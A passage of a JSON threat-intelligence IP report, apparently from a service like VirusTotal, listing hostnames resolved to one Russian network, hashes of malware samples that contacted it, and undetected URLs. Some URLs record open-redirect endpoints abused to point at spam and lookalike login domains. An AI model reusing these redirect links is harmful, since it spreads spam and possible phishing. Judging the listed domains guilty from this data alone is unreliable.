00:00:00\", \"hostname\": \"artpon.ru\"}, {\"last_resolved\": \"2018-09-25 16:59:15\", \"hostname\": \"artproservice.ru\"}, {\"last_resolved\": \"2018-09-15 01:58:57\", \"hostname\": \"artprotom.ru\"}, {\"last_resolved\": \"2019-01-20 08:50:51\", \"hostname\": \"artpub.ru\"}, {\"last_resolved\": \"2014-03-12 00:00:00\", \"hostname\": \"artstroybyuro.ru\"}, {\"last_resolved\": \"2019-02-05 13:19:37\", \"hostname\": \"arttech.school\"}, {\"last_resolved\": \"2015-01-20 00:00:00\", \"hostname\": \"artum-hr.ru\"}, {\"last_resolved\": \"2018-09-09 05:56:10\", \"hostname\": \"artvulmarket.ru\"}, {\"last_resolved\": \"2018-10-11 17:05:08\", \"hostname\": \"artwoodmaster.com\"}, {\"last_resolved\": \"2018-07-11 12:27:19\", \"hostname\": \"arwin.ru\"}, {\"last_resolved\": \"2017-05-19 00:00:00\", \"hostname\": \"as-alp.ru\"}, {\"last_resolved\": \"2018-04-30 14:20:09\", \"hostname\": \"as-avtoservis.transteh.net\"}, {\"last_resolved\": \"2017-11-14 00:00:00\", \"hostname\": \"asa.noncommerce.ru\"}, {\"last_resolved\": \"2019-01-19 09:31:59\", \"hostname\": \"asat.ru\"}, {\"last_resolved\": \"2015-08-13 00:00:00\", \"hostname\": \"asbem.ru\"}, {\"last_resolved\": \"2014-03-11 00:00:00\", \"hostname\": \"asc-skoda.ru\"}, {\"last_resolved\": \"2016-09-19 00:00:00\", \"hostname\": \"ascort.ru\"}, {\"last_resolved\": \"2014-03-11 00:00:00\", \"hostname\": \"ascskoda.ru\"}, {\"last_resolved\": \"2019-03-12 07:42:40\", \"hostname\": \"asiahit.ru\"}, {\"last_resolved\": \"2018-09-24 08:49:21\", \"hostname\": \"asianfashionroom.ru\"}, {\"last_resolved\": \"2017-10-19 00:00:00\", \"hostname\": \"asiaturizm.ru\"}, {\"last_resolved\": \"2018-09-08 12:37:35\", \"hostname\": \"aska-el.ru\"}, {\"last_resolved\": \"2013-04-01 00:00:00\", \"hostname\": \"askarbin.ru\"}, {\"last_resolved\": \"2018-06-27 08:00:27\", \"hostname\": \"askold-servis.transteh.net\"}, {\"last_resolved\": \"2018-09-08 18:13:17\", \"hostname\": \"asmik.info\"}, {\"last_resolved\": \"2019-03-08 18:36:39\", \"hostname\": \"asse.ru\"}, {\"last_resolved\": \"2018-10-11 21:38:15\", \"hostname\": \"assigroup.ru\"}, {\"last_resolved\": \"2018-10-08 05:33:21\", \"hostname\": \"assorg.ru\"}, {\"last_resolved\": \"2019-01-09 09:56:33\", \"hostname\": \"assower.ru\"}, {\"last_resolved\": \"2019-01-04 20:45:23\", \"hostname\": \"astra-tort.ru\"}, {\"last_resolved\": \"2018-02-12 00:00:00\", \"hostname\": \"astra.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2016-06-22 00:00:00\", \"hostname\": \"astrahan.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2018-09-11 00:51:55\", \"hostname\": \"astramos.ru\"}, {\"last_resolved\": \"2019-01-29 04:55:16\", \"hostname\": \"astro-master.ru\"}, {\"last_resolved\": \"2017-05-19 00:00:00\", \"hostname\": \"astroi.org\"}, {\"last_resolved\": \"2019-01-16 14:13:10\", \"hostname\": \"astrontex.ru\"}, {\"last_resolved\": \"2018-06-30 21:28:59\", \"hostname\": \"astwork.ru\"}, {\"last_resolved\": \"2018-09-22 01:06:51\", \"hostname\": \"asu78.ru\"}, {\"last_resolved\": \"2018-11-21 08:10:58\", \"hostname\": \"asvp.lv\"}, {\"last_resolved\": \"2018-12-28 20:41:53\", \"hostname\": \"asvplv.ru\"}, {\"last_resolved\": \"2016-02-29 00:00:00\", \"hostname\": \"asx-market.ru\"}, {\"last_resolved\": \"2016-07-04 00:00:00\", \"hostname\": \"asx.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2016-04-13 00:00:00\", \"hostname\": \"at-dream.ru\"}, {\"last_resolved\": \"2018-06-24 22:27:45\", \"hostname\": \"atamanoff.ru\"}, {\"last_resolved\": \"2018-06-18 22:32:27\", \"hostname\": \"atasmusic.ru\"}, {\"last_resolved\": \"2019-01-06 12:42:31\", \"hostname\": \"atlant-complex.ru\"}, {\"last_resolved\": \"2018-12-21 00:36:46\", \"hostname\": \"atlant-kr.ru\"}, {\"last_resolved\": \"2018-08-29 05:10:47\", \"hostname\": \"atlant-system.ru\"}, {\"last_resolved\": \"2017-10-17 00:00:00\", \"hostname\": \"atlantida64.ru\"}, {\"last_resolved\": \"2018-05-29 04:25:52\", \"hostname\": \"atlas-geely.ru\"}, {\"last_resolved\": \"2015-08-17 00:00:00\", \"hostname\": \"atmx.ru\"}, {\"last_resolved\": \"2018-05-23 10:41:44\", \"hostname\": \"atomtes.ru\"}, {\"last_resolved\": \"2019-03-02 14:49:15\", \"hostname\": \"atorrent.biz\"}, {\"last_resolved\": \"2018-08-27 12:35:10\", \"hostname\": \"atorrent.dmdevelopment.ru\"}, {\"last_resolved\": \"2014-10-10 00:00:00\", \"hostname\": \"atp-lesnoy.ru\"}, {\"last_resolved\": \"2018-06-30 21:28:36\", \"hostname\": \"atribut-s.ru\"}, {\"last_resolved\": \"2014-06-13 00:00:00\", \"hostname\": \"atriuminterio.ru\"}, {\"last_resolved\": \"2018-06-24 22:27:21\", \"hostname\": \"ats-avaya.ru\"}, {\"last_resolved\": \"2019-02-06 12:56:17\", \"hostname\": \"attackfootball.ru\"}, {\"last_resolved\": \"2018-09-10 01:18:18\", \"hostname\": \"attitudecreative.co.uk\"}, {\"last_resolved\": \"2018-08-07 21:32:04\", \"hostname\": \"attitudecreative.ru\"}, {\"last_resolved\": \"2018-10-04 14:23:49\", \"hostname\": \"audi-arenda.ru\"}, {\"last_resolved\": \"2016-03-16 00:00:00\", \"hostname\": \"audiomolitvoslov.ru\"}, {\"last_resolved\": \"2018-09-10 08:42:34\", \"hostname\": \"audiotest.su\"}, {\"last_resolved\": \"2018-09-09 22:42:29\", \"hostname\": \"audiovox.ru\"}, {\"last_resolved\": \"2018-08-26 22:46:51\", \"hostname\": \"audit.grundfos.ru\"}, {\"last_resolved\": \"2017-04-05 00:00:00\", \"hostname\": \"auen.ru\"}, {\"last_resolved\": \"2019-01-27 14:47:10\", \"hostname\": \"aukz.ru\"}, {\"last_resolved\": \"2018-07-17 10:13:11\", \"hostname\": \"auping-royal.ru\"}, {\"last_resolved\": \"2014-11-21 00:00:00\", \"hostname\": \"aura39.com\"}, {\"last_resolved\": \"2019-01-18 11:08:23\", \"hostname\": \"aurus.ru\"}, {\"last_resolved\": \"2019-03-08 18:44:10\", \"hostname\": \"autn.ru\"}, {\"last_resolved\": \"2018-11-24 00:32:58\", \"hostname\": \"auto-legion.ru\"}, {\"last_resolved\": \"2018-06-24 22:27:46\", \"hostname\": \"auto-liga.su\"}, {\"last_resolved\": \"2016-03-12 00:00:00\", \"hostname\": \"auto-obzory.ru\"}, {\"last_resolved\": \"2014-08-06 00:00:00\", \"hostname\": \"auto-souvenirs.ru\"}, {\"last_resolved\": \"2018-11-01 09:13:02\", \"hostname\": \"auto-stamos.ru\"}, {\"last_resolved\": \"2014-12-01 00:00:00\", \"hostname\": \"auto-th.ru\"}, {\"last_resolved\": \"2018-09-09 04:07:44\", \"hostname\": \"auto-vip.ru\"}, {\"last_resolved\": \"2018-04-19 09:48:02\", \"hostname\": \"auto.dvorec.ru\"}, {\"last_resolved\": \"2014-11-14 00:00:00\", \"hostname\": \"auto.kamelot36.ru\"}, {\"last_resolved\": \"2017-09-16 00:00:00\", \"hostname\": \"auto.megatula.ru\"}, {\"last_resolved\": \"2013-04-17 00:00:00\", \"hostname\": \"auto.rema-tiptop.ru\"}, {\"last_resolved\": \"2015-12-27 00:00:00\", \"hostname\": \"auto78.com\"}, {\"last_resolved\": \"2018-09-09 14:29:41\", \"hostname\": \"autoanswer.ru\"}, {\"last_resolved\": \"2018-12-30 12:53:52\", \"hostname\": \"autoboks.ru\"}, {\"last_resolved\": \"2017-05-19 00:00:00\", \"hostname\": \"autoboxy.ru\"}, {\"last_resolved\": \"2015-08-25 00:00:00\", \"hostname\": \"autobun.ru\"}, {\"last_resolved\": \"2019-01-22 12:49:01\", \"hostname\": \"autocenter-neva.ru\"}, {\"last_resolved\": \"2018-05-26 10:20:42\", \"hostname\": \"autodiamond-avtoservis-dlya-kitaiskih-avto.transteh.net\"}, {\"last_resolved\": \"2019-03-02 11:48:52\", \"hostname\": \"autogirl.net\"}, {\"last_resolved\": \"2018-09-26 00:19:15\", \"hostname\": \"autograf71.ru\"}, {\"last_resolved\": \"2016-06-25 00:00:00\", \"hostname\": \"autogy.ru\"}, {\"last_resolved\": \"2018-12-06 12:36:32\", \"hostname\": \"autoinfo59.ru\"}, {\"last_resolved\": \"2018-10-07 05:37:48\", \"hostname\": \"autojourney.ru\"}, {\"last_resolved\": \"2018-11-25 09:52:28\", \"hostname\": \"autolawyer.ru\"}, {\"last_resolved\": \"2013-07-16 00:00:00\", \"hostname\": \"autolive.pro\"}, {\"last_resolved\": \"2019-03-12 10:52:18\", \"hostname\": \"autolombard.club\"}, {\"last_resolved\": \"2019-02-21 18:07:24\", \"hostname\": \"autolombard.credit\"}, {\"last_resolved\": \"2018-10-08 19:40:26\", \"hostname\": \"automationhouse.ru\"}, {\"last_resolved\": \"2019-01-01 20:54:36\", \"hostname\": \"automustang.ru\"}, {\"last_resolved\": \"2018-09-08 01:46:05\", \"hostname\": \"autonat.ru\"}, {\"last_resolved\": \"2019-03-02 20:43:41\", \"hostname\": \"autonut.ru\"}, {\"last_resolved\": \"2016-02-11 00:00:00\", \"hostname\": \"autook.org\"}, {\"last_resolved\": \"2015-08-17 00:00:00\", \"hostname\": \"autoopen.ru\"}, {\"last_resolved\": \"2019-03-08 18:51:21\", \"hostname\": \"autorazborki.ru\"}, {\"last_resolved\": \"2019-02-01 12:54:24\", \"hostname\": \"autorazdel.com\"}, {\"last_resolved\": \"2018-12-14 01:52:10\", \"hostname\": \"autorg.ru\"}, {\"last_resolved\": \"2018-08-28 00:58:45\", \"hostname\": \"autorynok76.ru\"}, {\"last_resolved\": \"2014-03-11 00:00:00\", \"hostname\": \"autoskoda.ru\"}, {\"last_resolved\": \"2018-08-24 20:16:58\", \"hostname\": \"autosprinter.ru\"}, {\"last_resolved\": \"2018-05-23 22:34:52\", \"hostname\": \"autoterria.ru\"}, {\"last_resolved\": \"2018-04-19 12:23:22\", \"hostname\": \"autsor.ru\"}, {\"last_resolved\": \"2018-07-12 04:32:32\", \"hostname\": \"avangardhleb.com\"}, {\"last_resolved\": \"2019-01-07 00:40:38\", \"hostname\": \"avangardm.ru\"}, {\"last_resolved\": \"2018-10-03 12:44:44\", \"hostname\": \"avangardmm.ru\"}, {\"last_resolved\": \"2018-06-12 22:27:32\", \"hostname\": \"avanproekt.ru\"}, {\"last_resolved\": \"2018-10-31 00:57:12\", \"hostname\": \"avarkomm.ru\"}, {\"last_resolved\": \"2015-08-17 00:00:00\", \"hostname\": \"avataris-flor.ru\"}, {\"last_resolved\": \"2018-08-24 06:10:52\", \"hostname\": \"avelife.ru\"}, {\"last_resolved\": \"2019-03-08 12:06:16\", \"hostname\": \"avelifesystems.com\"}, {\"last_resolved\": \"2018-10-25 00:23:00\", \"hostname\": \"avemeandr.ru\"}, {\"last_resolved\": \"2016-07-02 00:00:00\", \"hostname\": \"avensis.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2015-06-10 00:00:00\", \"hostname\": \"aventador40.ru\"}, {\"last_resolved\": \"2019-01-28 01:15:21\", \"hostname\": \"aventin.info\"}, {\"last_resolved\": \"2014-03-20 00:00:00\", \"hostname\": \"avenue77.net\"}, {\"last_resolved\": \"2017-07-16 00:00:00\", \"hostname\": \"aveo.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2018-07-11 13:41:10\", \"hostname\": \"avesvarka.ru\"}, {\"last_resolved\": \"2018-10-04 16:08:39\", \"hostname\": \"avia-bileti.online\"}, {\"last_resolved\": \"2013-08-27 00:00:00\", \"hostname\": \"avia-motors.com\"}, {\"last_resolved\": \"2018-11-25 04:34:37\", \"hostname\": \"avia-prom.com\"}, {\"last_resolved\": \"2018-05-02 04:06:02\", \"hostname\": \"aviakompaniya-kolva.arh24.ru\"}, {\"last_resolved\": \"2018-10-25 13:53:04\", \"hostname\": \"aviamarka.com\"}, {\"last_resolved\": \"2018-09-10 14:46:14\", \"hostname\": \"aviamarka.ru\"}, {\"last_resolved\": \"2017-11-07 00:00:00\", \"hostname\": \"avianormal.ru\"}, {\"last_resolved\": \"2019-02-07 05:02:15\", \"hostname\": \"aviatver.ru\"}, {\"last_resolved\": \"2019-02-06 06:37:24\", \"hostname\": \"avicenna-rostov.ru\"}, {\"last_resolved\": \"2016-03-11 00:00:00\", \"hostname\": \"avis.moscow\"}, {\"last_resolved\": \"2018-08-13 13:26:00\", \"hostname\": \"avism.ru\"}, {\"last_resolved\": \"2018-09-08 23:52:02\", \"hostname\": \"avivo.ru\"}, {\"last_resolved\": \"2018-09-08 09:11:45\", \"hostname\": \"avmair.ru\"}, {\"last_resolved\": \"2016-11-29 00:00:00\", \"hostname\": \"avroracinema.com\"}, {\"last_resolved\": \"2019-01-02 13:04:59\", \"hostname\": \"avto-1s.ru\"}, {\"last_resolved\": \"2018-08-06 11:29:10\", \"hostname\": \"avto-legion.ru\"}, {\"last_resolved\": \"2018-09-09 17:18:49\", \"hostname\": \"avto-luxe.com\"}, {\"last_resolved\": \"2019-01-18 00:17:25\", \"hostname\": \"avto-set.ru\"}, {\"last_resolved\": \"2018-07-17 22:37:04\", \"hostname\": \"avto-tonirovka.ru\"}, {\"last_resolved\": \"2019-03-10 21:39:31\", \"hostname\": \"avto-tourizm.ru\"}, {\"last_resolved\": \"2018-09-21 01:51:24\", \"hostname\": \"avto112.ru\"}, {\"last_resolved\": \"2018-09-10 03:36:21\", \"hostname\": \"avtoarenda24.com\"}, {\"last_resolved\": \"2017-05-07 00:00:00\", \"hostname\": \"avtoarenda24.ru\"}, {\"last_resolved\": \"2018-12-29 16:47:36\", \"hostname\": \"avtobattery.ru\"}, {\"last_resolved\": \"2018-09-10 17:29:57\", \"hostname\": \"avtoboxi.ru\"}, {\"last_resolved\": \"2018-09-08 19:50:21\", \"hostname\": \"avtoboxy.ru\"}, {\"last_resolved\": \"2019-03-07 09:53:26\", \"hostname\": \"avtocon.ru\"}, {\"last_resolved\": \"2018-12-07 15:19:33\", \"hostname\": \"avtogrand-spb.ru\"}, {\"last_resolved\": \"2018-03-06 00:00:00\", \"hostname\": \"avtogrev-servisnaya-sluzhba.transteh.net\"}, {\"last_resolved\": \"2015-06-13 00:00:00\", \"hostname\": \"avtomilor.ru\"}, {\"last_resolved\": \"2015-09-02 00:00:00\", \"hostname\": \"avtorent.su\"}, {\"last_resolved\": \"2018-05-27 01:34:50\", \"hostname\": \"avtorizovannii-servisnii-centr.kirov7.ru\"}, {\"last_resolved\": \"2018-02-03 00:00:00\", \"hostname\": \"avtoservis-balabanovo.ru\"}, {\"last_resolved\": \"2014-03-11 00:00:00\", \"hostname\": \"avtoskoda.ru\"}, {\"last_resolved\": \"2019-01-26 16:43:36\", \"hostname\": \"avtospek.ru\"}, {\"last_resolved\": \"2019-01-29 09:00:31\", \"hostname\": \"avtoteplitsa.ru\"}, {\"last_resolved\": \"2018-09-08 20:34:39\", \"hostname\": \"avtotoday.ru\"}, {\"last_resolved\": \"2018-10-26 02:03:28\", \"hostname\": \"avtotovary33.ru\"}, {\"last_resolved\": \"2019-03-12 08:26:57\", \"hostname\": \"avtotransit.ru\"}, {\"last_resolved\": \"2018-09-21 23:50:52\", \"hostname\": \"avtovikup174.ru\"}, {\"last_resolved\": \"2017-04-04 00:00:00\", \"hostname\": \"avtovishki.ru\"}, {\"last_resolved\": \"2014-10-06 00:00:00\", \"hostname\": \"avtroof.ru\"}, {\"last_resolved\": \"2018-12-19 12:49:08\", \"hostname\": \"awerin.ru\"}, {\"last_resolved\": \"2019-02-19 05:03:36\", \"hostname\": \"awillon.ru\"}, {\"last_resolved\": \"2019-03-07 05:30:04\", \"hostname\": \"awmgroup.ru\"}, {\"last_resolved\": \"2019-01-18 06:18:45\", \"hostname\": \"axilla.ru\"}, {\"last_resolved\": \"2018-08-24 10:23:23\", \"hostname\": \"axioma-club.ru\"}, {\"last_resolved\": \"2018-10-07 13:12:25\", \"hostname\": \"aym.ru\"}, {\"last_resolved\": \"2018-06-27 18:54:41\", \"hostname\": \"ayprint.ru\"}, {\"last_resolved\": \"2019-03-08 22:59:06\", \"hostname\": \"aznar.az\"}, {\"last_resolved\": \"2019-03-07 04:15:31\", \"hostname\": \"azovlib.ru\"}, {\"last_resolved\": \"2018-08-22 05:42:10\", \"hostname\": \"azrsm.ru\"}, {\"last_resolved\": \"2019-02-10 04:48:55\", \"hostname\": \"b-f.ru\"}, {\"last_resolved\": \"2019-01-08 04:48:43\", \"hostname\": \"b-face.ru\"}, {\"last_resolved\": \"2018-08-19 22:56:35\", \"hostname\": \"b-parfum.ru\"}, {\"last_resolved\": \"2019-03-05 14:37:22\", \"hostname\": \"babor.su\"}, {\"last_resolved\": \"2019-02-24 01:48:41\", \"hostname\": \"baburino.ru\"}, {\"last_resolved\": \"2018-12-27 08:46:12\", \"hostname\": \"babushka-doll.com\"}, {\"last_resolved\": \"2015-04-16 00:00:00\", \"hostname\": \"baby-boom37.ru\"}, {\"last_resolved\": \"2016-11-17 00:00:00\", \"hostname\": \"baby-luxe.ru\"}, {\"last_resolved\": \"2015-01-21 00:00:00\", \"hostname\": \"baby-obuv.ru\"}, {\"last_resolved\": \"2017-12-10 00:00:00\", \"hostname\": \"baby-shop-tn.ru\"}, {\"last_resolved\": \"2018-03-09 00:00:00\", \"hostname\": \"baby.bvdent.ru\"}, {\"last_resolved\": \"2018-07-11 21:56:12\", \"hostname\": \"babyeshop.ru\"}, {\"last_resolved\": \"2019-02-28 19:37:36\", \"hostname\": \"babylonvape.com\"}, {\"last_resolved\": \"2018-12-04 17:48:03\", \"hostname\": \"babymassage.ru\"}, {\"last_resolved\": \"2013-05-17 00:00:00\", \"hostname\": \"badmintonblog.ru\"}, {\"last_resolved\": \"2019-01-20 05:22:31\", \"hostname\": \"bagatelle.ru\"}, {\"last_resolved\": \"2018-09-08 10:35:58\", \"hostname\": \"bagaturia.com\"}, {\"last_resolved\": \"2018-09-09 03:27:11\", \"hostname\": \"bagaturia.ru\"}, {\"last_resolved\": \"2018-10-11 05:15:12\", \"hostname\": \"baget-novogireevo.ru\"}, {\"last_resolved\": \"2018-07-04 23:47:14\", \"hostname\": \"bagira.kr.ua\"}, {\"last_resolved\": \"2019-02-25 12:15:28\", \"hostname\": \"bagsbunny.ru\"}, {\"last_resolved\": \"2018-09-07 20:35:08\", \"hostname\": \"bahama.ru\"}, {\"last_resolved\": \"2014-04-30 00:00:00\", \"hostname\": \"baikov.ru\"}, {\"last_resolved\": \"2019-03-06 10:05:18\", \"hostname\": \"bair.ru\"}, {\"last_resolved\": \"2018-03-06 00:00:00\", \"hostname\": \"baitekmachinery-torgovo-servisnaya-kompaniya.transteh.net\"}, {\"last_resolved\": \"2016-06-22 00:00:00\", \"hostname\": \"balakovo.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2019-01-27 08:51:25\", \"hostname\": \"balalaika-bs.com\"}, {\"last_resolved\": \"2018-07-30 13:38:30\", \"hostname\": \"balchug.wide-color.ru\"}, {\"last_resolved\": \"2018-12-18 18:56:54\", \"hostname\": \"balestrini.ru\"}, {\"last_resolved\": \"2018-09-10 08:42:34\", \"hostname\": \"ballmasquerade.ru\"}, {\"last_resolved\": \"2019-01-27 02:18:46\", \"hostname\": \"balloon.goodtimes.ru\"}, {\"last_resolved\": \"2018-07-03 18:07:28\", \"hostname\": \"balteau.ru\"}, {\"last_resolved\": \"2017-11-16 00:00:00\", \"hostname\": \"baltica-auto.ru\"}, {\"last_resolved\": \"2019-02-07 22:54:17\", \"hostname\": \"balticstar.spb.ru\"}, {\"last_resolved\": \"2017-11-16 00:00:00\", \"hostname\": \"baltika-auto.ru\"}, {\"last_resolved\": \"2019-03-07 16:58:02\", \"hostname\": \"baltika21.ru\"}, {\"last_resolved\": \"2018-06-12 22:28:11\", \"hostname\": \"baltikaauto.ru\"}, {\"last_resolved\": \"2018-12-29 16:37:43\", \"hostname\": \"baltkon.ru\"}, {\"last_resolved\": \"2019-02-11 01:11:39\", \"hostname\": \"baltlib.ru\"}, {\"last_resolved\": \"2018-11-28 12:41:13\", \"hostname\": \"bank59.ru\"}, {\"last_resolved\": \"2019-02-01 12:59:09\", \"hostname\": \"banket16.ru\"}, {\"last_resolved\": \"2019-03-11 05:18:50\", \"hostname\": \"banketing.com\"}, {\"last_resolved\": \"2014-12-25 00:00:00\", \"hostname\": \"bankmoney.su\"}, {\"last_resolved\": \"2017-12-26 00:00:00\", \"hostname\": \"banya-iz-brevna.ru\"}, {\"last_resolved\": \"2015-11-06 00:00:00\", \"hostname\": \"bar-street.ru\"}, {\"last_resolved\": \"2016-07-06 00:00:00\", \"hostname\": \"bar-street.su\"}, {\"last_resolved\": \"2018-09-08 02:53:17\", \"hostname\": \"bar.perm.ru\"}, {\"last_resolved\": \"2018-06-12 22:28:25\", \"hostname\": \"baranienbaum.ru\"}, {\"last_resolved\": \"2018-10-17 22:27:54\", \"hostname\": \"barawki.ru\"}, {\"last_resolved\": \"2016-05-20 00:00:00\", \"hostname\": \"bardjango.ru\"}, {\"last_resolved\": \"2016-06-22 00:00:00\", \"hostname\": \"barnaul.fabrika-chehlov.ru\"}, {\"last_resolved\": \"2018-09-10 14:41:33\", \"hostname\": \"barrierfree.ru\"}, {\"last_resolved\": \"2018-11-06 05:37:14\", \"hostname\": \"bars-logistics.ru\"}, {\"last_resolved\": \"2018-09-08 05:59:58\", \"hostname\": \"bars-pilot.ru\"}, {\"last_resolved\": \"2018-09-10 18:52:12\", \"hostname\": \"bars.perm.ru\"}, {\"last_resolved\": \"2018-06-13 21:10:59\", \"hostname\": \"barstreetshow.com\"}, {\"last_resolved\": \"2018-03-10 00:00:00\", \"hostname\": \"base4beauty.ru\"}, {\"last_resolved\": \"2019-01-29 08:51:12\", \"hostname\": \"base4web.ru\"}, {\"last_resolved\": \"2019-03-06 16:05:39\", \"hostname\": \"bashstroytek.ru\"}, {\"last_resolved\": \"2018-11-28 17:50:55\", \"hostname\": \"bass-line.ru\"}, {\"last_resolved\": \"2018-10-17 17:18:12\", \"hostname\": \"bassacademy.ru\"}, {\"last_resolved\": \"2018-08-29 13:21:23\", \"hostname\": \"bath-bloom.ru\"}, {\"last_resolved\": \"2018-08-13 22:15:56\", \"hostname\": \"bathbloom.ru\"}, {\"last_resolved\": \"2018-10-23 21:04:22\", \"hostname\": \"batterymart.ru\"}, {\"last_resolved\": \"2018-03-22 00:00:00\", \"hostname\": \"battlefront3.ru\"}, {\"last_resolved\": \"2018-09-08 20:48:02\", \"hostname\": \"battlekids.ru\"}, {\"last_resolved\": \"2017-10-08 00:00:00\", \"hostname\": \"bau-home.ru\"}, {\"last_resolved\": \"2019-03-11 21:55:07\", \"hostname\": \"bauteh.ru\"}, {\"last_resolved\": \"2018-09-10 14:11:35\", \"hostname\": \"bayzshop.com\"}, {\"last_resolved\": \"2018-06-01 14:32:20\", \"hostname\": \"bazaar.guerrilla.ru\"}, {\"last_resolved\": \"2019-01-24 00:55:38\", \"hostname\": \"bazalt-filtr.ru\"}, {\"last_resolved\": \"2016-02-17 00:00:00\", \"hostname\": \"bazi-coaching.ru\"}, {\"last_resolved\": \"2019-01-17 12:54:00\", \"hostname\": \"bcons.su\"}, {\"last_resolved\": \"2018-08-23 09:41:43\", \"hostname\": \"bcparkpobedy.ru\"}, {\"last_resolved\": \"2018-09-26 16:04:52\", \"hostname\": \"bd-live.ru\"}, {\"last_resolved\": \"2015-08-14 00:00:00\", \"hostname\": \"bdfilms.ru\"}, {\"last_resolved\": \"2018-10-03 15:53:56\", \"hostname\": \"bdlive.ru\"}, {\"last_resolved\": \"2019-01-04 12:57:34\", \"hostname\": \"bds-stanki.ru\"}, {\"last_resolved\": \"2018-11-26 16:26:28\", \"hostname\": \"be-print.ru\"}, {\"last_resolved\": \"2015-08-25 00:00:00\", \"hostname\": \"bean-bag.ru\"}, {\"last_resolved\": \"2018-09-30 12:37:09\", \"hostname\": \"bearpower.store\"}, {\"last_resolved\": \"2016-02-04 00:00:00\", \"hostname\": \"beauty-salon-monroe.ru\"}, {\"last_resolved\": \"2014-10-27 00:00:00\", \"hostname\": \"beauty-shop.me\"}, {\"last_resolved\": \"2018-06-26 12:05:31\", \"hostname\": \"beautyelements.ru\"}, {\"last_resolved\": \"2018-08-19 17:43:51\", \"hostname\": \"bebloks.ru\"}], \"detected_communicating_samples\": [{\"date\": \"2018-11-17 08:28:43\", \"positives\": 38, \"total\": 68, \"sha256\": \"d39f69b8efa90b8ddce181733d27398c9d42f8c0abffd47ebefdc711878a8325\"}, {\"date\": \"2018-09-23 05:12:13\", \"positives\": 42, \"total\": 69, \"sha256\": \"05c2b6323bf5e53582f4805f7f4c2921e32eb048349d01e9b4f93501511565b9\"}, {\"date\": \"2017-07-18 22:48:08\", \"positives\": 43, \"total\": 58, \"sha256\": \"834a541a73ab333b08a88ee2186d09e100e76d86a1b03255a601f53315124849\"}, {\"date\": \"2016-08-10 04:38:54\", \"positives\": 35, \"total\": 55, \"sha256\": \"95994d8c0079c9b1f2335308e36858485a971cde561fb46da2f233d6269974ec\"}, {\"date\": \"2015-11-24 20:10:16\", \"positives\": 39, \"total\": 55, \"sha256\": \"dcd206fd60092c6b53cbdff72999c498ab3eeaad57dffeb6bd6eccd4f7efb0ba\"}, {\"date\": \"2015-11-08 21:05:38\", \"positives\": 32, \"total\": 53, \"sha256\": \"71c4d3519dc9fbe5dd6805f11c2a6964bb5396bca51db4933aee6cea37b69d79\"}, {\"date\": \"2015-03-10 20:50:13\", \"positives\": 44, \"total\": 57, \"sha256\": \"fe458976b843d2718d18b1f6f0e9dfaf0ac40769b4f3730e8d19b403df5941c5\"}, {\"date\": \"2014-12-18 00:21:31\", \"positives\": 33, \"total\": 56, \"sha256\": \"81c711095961a301d47c659e84fd4d5b63270e105a69ac533350b81753c7917b\"}, {\"date\": \"2014-04-23 15:51:34\", \"positives\": 39, \"total\": 51, \"sha256\": \"b6c7c01b64da3530ec5d79958457ed6c5b3b51c6e1b1251e5568137ed8cebc6a\"}, {\"date\": \"2014-03-19 07:53:59\", \"positives\": 33, \"total\": 50, \"sha256\": \"16c1541100e7e7b72f67434183dad76ef0d0ec4cacc70a738dea2bdf4230fbdc\"}, {\"date\": \"2014-01-24 12:49:49\", \"positives\": 42, \"total\": 50, \"sha256\": \"71afd12d604ef9d98a96fd5e5e7d208be47725fad6b1896cc0bab28ddbd0e0b0\"}, {\"date\": \"2013-12-01 12:32:25\", \"positives\": 4, \"total\": 48, \"sha256\": \"f91d4b0b0baafc1e02756663fb173dc78a8ad13893f61aa4e5efeb1ddd3be80e\"}, {\"date\": \"2013-08-15 21:58:00\", \"positives\": 29, \"total\": 46, \"sha256\": \"26f5624be971d2a84112bced236c765c889439d7c59c3f32ceb6f341636bf277\"}, {\"date\": \"2013-07-19 07:15:20\", \"positives\": 26, \"total\": 47, \"sha256\": \"db001e6a5e70ba9967d643baddaebad4c16846677593f15520fa86ba0260edbf\"}, {\"date\": \"2013-07-18 07:53:56\", \"positives\": 28, \"total\": 46, \"sha256\": \"1ef08bc37a1458fff6d1f5cc590119eeec732882c74e0ed6c42845e024d02df5\"}, {\"date\": \"2013-04-16 16:33:09\", \"positives\": 30, \"total\": 46, \"sha256\": \"90abeb3817a7b4b2673bf0e89534ab323ec9082d140fe519748bacbc9ec560cb\"}], \"continent\": \"EU\", \"asn\": \"25532\", \"network\": \"90.156.128.0/17\", \"undetected_urls\": [[\"http://parksale.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://www.actualtestdumps.com\", \"9189217c86fb27fa2a5d8a69a0be357f65adacbb17e08ca29f429b98391898da\", 0, 69, \"2019-03-12 10:53:01\"], [\"http://www.np-stroykons.ru/links.php?id=suntikglutax.home.blog\", \"e197b2fed914957acb15c81e03688c8eddb8436467455dcb2ebd798095f57871\", 0, 69, \"2019-03-11 23:36:09\"], [\"http://cit-tmb.ru/bitrix/redirect.php?ev.....o-thuy-luc-1-tan-nang-cao-2-met-278.html\", \"4da1cbb9c6fb0fe747b523ccd19b8a71df5e48675af41124e406ba170ed7ddb2\", 0, 69, \"2019-03-11 06:28:01\"], [\"http://www.avtotransit.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://oceansoxygen.com/\", \"ab65e3dc8b9cecd46082febc41115cdc8fec3939c411530421fdd042c2e305ea\", 0, 69, \"2019-03-09 21:55:51\"], [\"http://woodrex.ru/go.php?go=https://kchurchofchrist.com%2Findex.php%3Fmid%3Dboard_XlWR16%26document_srl%3D618897\", \"030ee70e6bb22d3272aa4f78bc459117902a20f4df85ae6f9cf472d424f2c164\", 0, 69, \"2019-03-07 09:24:37\"], [\"http://www.avtotransit.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://gmailemailloginsx.com/\", \"f52e2dccaff3ad7756c7910c3892638c79f20a314022ea5a3abfba1f349fe527\", 0, 69, \"2019-03-05 05:37:54\"], [\"http://www.avtotransit.ru/bitrix/redirect.php?event1=&amp;event2=&amp;event3=&amp;goto=http://krispaydayloans.com/\", \"9e2f49a380d1965ff01bd3208dcdf80ebdb57e59f7347c34ccda8035baa75f96\", 0, 69, \"2019-03-05 05:32:09\"], 